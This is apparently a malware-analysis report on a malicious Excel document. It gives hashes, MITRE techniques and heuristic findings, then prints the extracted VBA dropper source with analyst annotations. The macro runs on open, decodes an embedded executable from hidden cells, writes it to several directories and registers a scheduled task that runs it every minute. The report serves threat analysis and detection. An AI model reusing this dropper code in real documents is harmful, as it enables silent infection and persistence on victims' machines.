Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 08261ed40e21140e…

MALICIOUS

Office (OLE)

1.81 MB Created: 2021-05-17 06:41:14 First seen: 2021-06-17
MD5: a90ae3747764127decae5a0d7856ef95 SHA-1: 254e134490a0b74b3a66626fc0d62ff972cfc1a2 SHA-256: 08261ed40e21140eb438f16af0233217c701d9b022dce0a45b6e3e1ee2467739
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The sample contains a Workbook_Open VBA macro that is triggered upon opening the document. This macro decodes a Base64 string, modifies it, and writes it to disk as 'MsNpENg' in two potential locations: 'C:\ProgramData\MsNpENg\' and 'C:\Windows\debug\WIA\MsNpENg\' (the extracted source below also shows a third fallback, 'C:\Users\Public\PublicVideos\MsNpENg\', and the registration of a scheduled task named 'Optimize Machine Analysis' that runs the dropped file). The CreateObject call and the execution of VBA code indicate malicious intent, likely to download and execute a second-stage payload.

Heuristics 4

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5780 bytes
SHA-256: 38ffca938856b072056b51a64080e86c1b7d10dcff1d731f4143df36d7f2e6fe
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Exported module attributes: VB_Name identifies this as the workbook's
' "ThisWorkbook" document module, which is where the Workbook_Open event
' handler below is hosted.
' Auto-execution entry point: Excel raises this event when the workbook is
' opened (flagged as OLE_VBA_WBOPEN in the findings above). It first runs
' the dropper routine (misspelled "claculate") and then "complete", which
' adjusts sheet visibility.
Private Sub Workbook_Open()
claculate
complete
End Sub
' Post-drop adjustment of the document's appearance: with all errors
' suppressed, three named sheets are made visible and "Sheet1" is set to
' xlSheetVeryHidden (a sheet in that state cannot be unhidden from the
' Excel UI, only through VBA). Note the payload data is read from
' "Sheet00" in claculate, not from the sheet hidden here.
Public Function complete()
On Error Resume Next
Worksheets("Technical Support").Visible = True
Worksheets("Sales Manager").Visible = True
Worksheets("HR").Visible = True
Worksheets("Sheet1").Visible = xlSheetVeryHidden
End Function
' Concatenates the .Value of every cell in myRange into one string.
' Returns "" when myRange is Nothing.
Function RangeToString(ByVal myRange As Range) As String
    RangeToString = ""
    If Not myRange Is Nothing Then
        Dim myCell As Range
        For Each myCell In myRange
            RangeToString = RangeToString & myCell.Value
        Next myCell
        ' Right(s, Len(s)) returns s unchanged; this line is a no-op.
        RangeToString = Right(RangeToString, Len(RangeToString))
    End If
End Function
' Dropper routine (analyst annotation). Reassembles a Base64 blob stored in
' worksheet "Sheet00", double-decodes it to a byte array, writes it to disk
' under one of three fallback directories, and registers a Task Scheduler
' task that executes the dropped file. Every error is suppressed by
' On Error Resume Next, so failed steps silently fall through.
Private Function claculate()
On Error Resume Next

Dim pement As String


Dim rng As Range
' Payload staging: cells A1:A1755 of "Sheet00" hold the encoded data.
Set rng = Worksheets("Sheet00").Range("A1:A1755")
pement = RangeToString(rng)
' Strip '*' characters and prepend a fixed prefix:
' Chr(69 + 2 - 2) = Chr(69) = "E", then "Zx"; Chr(85 + 1) = Chr(86) = "V".
' The result is "VEZx" & data -- the arithmetic only obscures the literals.
pement = Chr(69 + 2 - 2) + "Zx" + Replace(pement, "*", "")
pement = Chr(85 + 1) + pement

Dim pementSum As String
' Two decoding rounds: Base64 -> string (DecodeBase64), then that string is
' Base64-decoded again into raw bytes.
pementSum = DecodeBase64(pement)
Dim peymentt() As Byte
peymentt = Base64ToArray(pementSum)
' First byte is forced to 77 (ASCII "M"); presumably restores the leading
' byte of an "MZ" header that was altered in the stored blob -- confirm
' against the carved payload.
peymentt(0) = 77

Dim ofso
' FileSystemObject is used only for the FileExists checks below.
Set ofso = CreateObject("Scripting.FileSystemObject")

Dim f As String
f = "MsNpENg"
Dim tm As String

' Drop location 1. MkDir errors (e.g. directory already exists) are
' swallowed by On Error Resume Next.
tm = "C:\ProgramData\MsNpENg\"
MkDir tm

' Raw binary write of the decoded bytes to <dir>\MsNpENg.
Open tm & f For Binary As #1
Put #1, 1, peymentt
Close #1

' Fallback chain: if no file resulted from the write (e.g. the directory
' was not writable), try the next location.
If ofso.FileExists(tm & f) = False Then
' Drop location 2.
tm = "C:\Windows\debug\WIA\MsNpENg\"
MkDir tm

Open tm & f For Binary As #1
Put #1, 1, peymentt
Close #1

If ofso.FileExists(tm & f) = False Then
' Drop location 3 (not listed in the report summary above).
tm = "C:\Users\Public\PublicVideos\MsNpENg\"
MkDir tm

Open tm & f For Binary As #1
Put #1, 1, peymentt
Close #1
End If

End If
' Persistence/execution via the Task Scheduler 2.0 COM API
' ("Schedule.Service"). Detection opportunity: scheduled-task registration
' by an Office process, and file creation in the directories above.
Const TriggerTypeTime = 1
Const ActionTypeExec = 0
' "service" is never declared (no Option Explicit), so it is an implicit
' Variant.
Set service = CreateObject("Schedule.Service")
Call service.Connect
Dim rootFolder
Set rootFolder = service.GetFolder("\")
Dim taskDefinition
Set taskDefinition = service.NewTask(0)
Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
' Description looks like leftover sample/documentation text and does not
' describe what the task actually runs.
regInfo.Description = "Start notepad at a certain time"
Dim principal
Set principal = taskDefinition.principal
' LogonType 3 = TASK_LOGON_INTERACTIVE_TOKEN: runs in the interactive
' user's session.
principal.LogonType = 3
Dim settings
Set settings = taskDefinition.settings
settings.Enabled = True
settings.StartWhenAvailable = True
' The task is NOT hidden, so it is visible in the Task Scheduler UI.
settings.Hidden = False
Dim triggers
Set triggers = taskDefinition.triggers
Dim trigger
' Time trigger firing 30 seconds after the macro runs.
Set trigger = triggers.Create(TriggerTypeTime)
Dim startTime, endTime
Dim time
time = DateAdd("s", 30, Now)
startTime = XmlTime(time)


trigger.StartBoundary = startTime
' endTime is never assigned, so the trigger receives an empty end boundary.
trigger.EndBoundary = endTime
trigger.ExecutionTimeLimit = "PT5M"
trigger.ID = "TimeTriggerId"
trigger.Enabled = True
Dim repetitionPattern
Set repetitionPattern = trigger.Repetition
' Re-runs the action every minute with no stop at duration end.
repetitionPattern.Interval = "PT1M"
trigger.Repetition.StopAtDurationEnd = False
Dim Action
' Exec action: runs the dropped file from whichever directory succeeded,
' passing the literal argument "MsNpENg".
Set Action = taskDefinition.Actions.Create(ActionTypeExec)
Action.Path = tm & f
Action.arguments = "MsNpENg"
' Registers the task (flags 6 = TASK_CREATE_OR_UPDATE, logon type 3) under
' the root folder with the benign-sounding name "Optimize Machine Analysis".
Call rootFolder.RegisterTaskDefinition( _
    "Optimize Machine Analysis", taskDefinition, 6, , , 3)
End Function
' Formats a Date t as "yyyy-mm-ddThh:mm:ss" for use as a scheduled-task
' StartBoundary. Each component is prefixed with "0" and truncated to its
' last two characters to get zero padding; the year is used as-is.
Function XmlTime(t)
    Dim cSecond, cMinute, CHour, cDay, cMonth, cYear
    Dim tTime, tDate

    cSecond = "0" & Second(t)
    cMinute = "0" & Minute(t)
    CHour = "0" & Hour(t)
    cDay = "0" & Day(t)
    cMonth = "0" & Month(t)
    cYear = Year(t)

    tTime = Right(CHour, 2) & ":" & Right(cMinute, 2) & _
        ":" & Right(cSecond, 2)
    tDate = cYear & "-" & Right(cMonth, 2) & "-" & Right(cDay, 2)
    XmlTime = tDate & "T" & tTime
End Function
' Base64-decodes b64 (the "$" suffix types the parameter as String) via
' Base64ToArray and converts the resulting bytes to a VBA string with
' StrConv(..., vbUnicode). Used by claculate for the first of its two
' decoding rounds.
Function DecodeBase64(b64$)
    Dim base64Decoded As String
    base64Decoded = StrConv(Base64ToArray(b64), vbUnicode)
    DecodeBase64 = base64Decoded
End Function
Private Function Base64ToArray(base64 As String) As Variant
    
    Dim xmlDoc As Object
    Dim xmlNode As Object
    
    Set xmlDoc = CreateObject("MSXML2.DOMDocument")
    Set xm
... (truncated)